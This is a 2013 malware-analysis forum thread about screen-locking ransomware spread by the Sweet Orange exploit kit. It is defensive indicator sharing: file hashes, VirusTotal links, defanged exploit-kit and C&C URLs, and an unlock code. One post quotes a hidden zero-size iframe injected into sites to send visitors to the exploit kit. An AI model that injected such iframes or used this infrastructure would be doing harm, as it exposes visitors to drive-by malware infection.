A forum for reverse engineering, OS internals and malware analysis 
 #18668  by EP_X0FF
 Sat Mar 23, 2013 2:47 pm
I think it is bugged, as it is impossible to enter the correct deactivation code.

As for me, the new appearance looks much better. It asks for ~65$, hm, inflation; I remember they started from ~15$ in 2011.

SHA1 07fd52bdc326d79c174d7ccd2e2cedb07e9ea3fb

https://www.virustotal.com/en/file/fe1a ... /analysis/
https://www.virustotal.com/en/file/6a7c ... /analysis/
 #19120  by EP_X0FF
 Tue Apr 30, 2013 12:25 pm
Dropper, payload of Sweet Orange EK.

Iframe to EK.
<iframe src="hxxp://df.pizdafyqib.ru/administrator/weather.php?browse=151" width="0" height="0" frameborder="0"></iframe>
SHA256: 11761b0b7d20efe6815f900cf8a0242dae9dec29ee0e309fd1b288e7b9b1c0ef
SHA1: 75dcb3332f21aa31bac16429290e7f6285184824
MD5: a73f6edd6f698edd692fbfe86855f6a4

https://www.virustotal.com/en/file/1176 ... /analysis/

EXE + Jar (CVE-2012-1723) in attach. Keep your Java up to date, or better get rid of it once and for all.
 #19122  by Xylitol
 Tue Apr 30, 2013 1:09 pm
EP_X0FF wrote:Keep your Java up to date
urlQuery got winlocked when I submitted the site http://urlquery.net/report.php?id=2243853
urlQuery Alerts	 No alerts detected
Not even detected as Sweet Orange :)
C&C:
hxxp://df.pizdafyqib.ru:8581/aw/index.php?m=stats
• dns: 1 ›› ip: 216.246.54.231 - adresse: DF.PIZDAFYQIB.RU
• dns: 1 ›› ip: 216.246.54.231 - adresse: B2B-VM6.VERTICALCOMMUNICATION.IN
 #19130  by mrbelyash
 Wed May 01, 2013 8:17 am
EP_X0FF wrote:I think it is bugged, as it is impossible to enter the correct deactivation code.

As for me, the new appearance looks much better. It asks for ~65$, hm, inflation; I remember they started from ~15$ in 2011.

SHA1 07fd52bdc326d79c174d7ccd2e2cedb07e9ea3fb

https://www.virustotal.com/en/file/fe1a ... /analysis/
https://www.virustotal.com/en/file/6a7c ... /analysis/
unlock code 121255545

http://stop-winlock.ru/2013/05/01/troja ... 15437.html
 #19166  by Xylitol
 Thu May 02, 2013 7:21 pm
EP_X0FF wrote:
hxxp://wsd.nuwazy.ru/sites/oplata/codestariff/themes.php?strategy=154
• dns: 1 ›› ip: 64.202.124.84 - adresse: WSD.NUWAZY.RU
hXXp://wsd.nuwazy.ru:8581/aw/
https://www.virustotal.com/ru/file/24f0 ... 367522337/
http://www.threatexpert.com/report.aspx ... c791b71390
Java 6 update 17 is enough to get the sample.
 #19180  by EP_X0FF
 Fri May 03, 2013 5:52 pm
Fresh
hxxp://za.omovigminet.ru/bugs/books/partner/themes.php?strategy=156
SHA256: e1dc306f502657cdc57fc4608aa6b4815747001478bf770afe7ec363fc264a8f
SHA1: 7d12a710f463d79e23ffe4f1bd94942537c3e868
MD5: c2b46eb6e92ebf65e9e8d580f17ecb98

https://www.virustotal.com/en/file/e1dc ... 367603355/
 #19263  by EP_X0FF
 Mon May 13, 2013 1:36 pm
Fresh
hxxp://rl7bh.ru/guest/recent.php?forums=170
landing
hxxp://z.ylyzafaq.ru/xx/
SHA256: 0bfbbf1eb94a2fb9004847a0b008c5fc688b0a04665f18dba3ef9a91c1a5dc87
SHA1: 4def049567188969f050893e93a8f61062182473
MD5: eb6f708178d87cec2e2588a379c23285

https://www.virustotal.com/ru/file/0bfb ... 368451928/